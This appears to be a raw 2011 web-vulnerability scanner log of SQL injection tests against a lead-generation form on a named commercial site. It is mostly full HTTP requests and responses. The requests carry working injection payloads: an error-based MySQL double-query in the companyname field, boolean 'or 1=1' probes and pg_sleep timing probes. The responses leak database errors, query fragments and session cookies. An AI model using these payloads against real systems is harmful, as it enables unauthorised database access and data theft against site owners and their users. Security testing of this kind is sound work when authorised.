GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR'&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:42:03 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10118
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... (97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'loan&attributeId_430=2792__$15,000 - 24,999&attributeId_431=2801__A business tha' at line 5
Request 2
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR''&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:42:04 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9941
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The attributeId_344_g parameter appears to be vulnerable to SQL injection attacks. The payloads 25510487'%20or%201%3d1--%20 and 25510487'%20or%201%3d2--%20 were each submitted in the attributeId_344_g parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:40:31 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=i75r53fukimlp0r4jpiunh67a7; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]... <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title> <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/> <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/> <link rel="stylesheet" href="css/newlanding_style.css" /> <link rel="stylesheet" href="style/dhtmlwindow.css" /> <link rel="stylesheet" href="css/ui.core.css" /> <link rel="stylesheet" href="css/Dyn_form_style.css" /> <script type="text/javascript" src='js/jquery.js'></script> <script type="text/javascript" src="js/ui.core.js"></script> <script type="text/javascript"> jQuery(document).ready(function() { jQuery("form").attr("autocomplete", "off"); }); var global_form_attribute = 8 </script>
The attributeId_344_g parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_344_g parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:21:57 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8326
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... rcard&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'loan&attributeId_430=2792__$15,000 - 24,999&attributeId_431=2801__A business tha' at line 5
The attributeId_429 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_429 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:22:19 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8326
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... rcard&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '000 - 24,999&attributeId_431=2801__A business that I am about to start&attribute' at line 5
The attributeId_429 parameter appears to be vulnerable to SQL injection attacks. The payloads 40938254'%20or%201%3d1--%20 and 40938254'%20or%201%3d2--%20 were each submitted in the attributeId_429 parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:41:14 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=7ct781bmi5l4nb9astk5g3hgb7; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]... <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title> <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/> <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/> <link rel="stylesheet" href="css/newlanding_style.css" /> <link rel="stylesheet" href="style/dhtmlwindow.css" /> <link rel="stylesheet" href="css/ui.core.css" /> <link rel="stylesheet" href="css/Dyn_form_style.css" /> <script type="text/javascript" src='js/jquery.js'></script> <script type="text/javascript" src="js/ui.core.js"></script> <script type="text/javascript"> jQuery(document).ready(function() { jQuery("form").attr("autocomplete", "off"); }); var global_form_attribute = 8 </script>
The attributeId_429 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_429 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan'&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:42:07 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10118
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... (97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '000 - 24,999&attributeId_431=2801__A business that I am about to start&attribute' at line 5
Request 2
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan''&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:42:08 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9941
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The attributeId_430 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_430 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999'&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:42:14 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10118
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... (97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'business that I am about to start&attributeId_432[]=2806__Business expansion&att' at line 5
Request 2
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999''&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:42:15 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9941
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The attributeId_430 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_430 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:22:24 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8326
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... rcard&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'business that I am about to start&attributeId_432[]=2806__Business expansion&att' at line 5
The attributeId_431 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_431 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:22:28 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8326
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... rcard&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2806__Business expansion&attributeId_433=2815__0-6 months (Start-up)&attribut' at line 5
The attributeId_431 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_431 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start'&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; 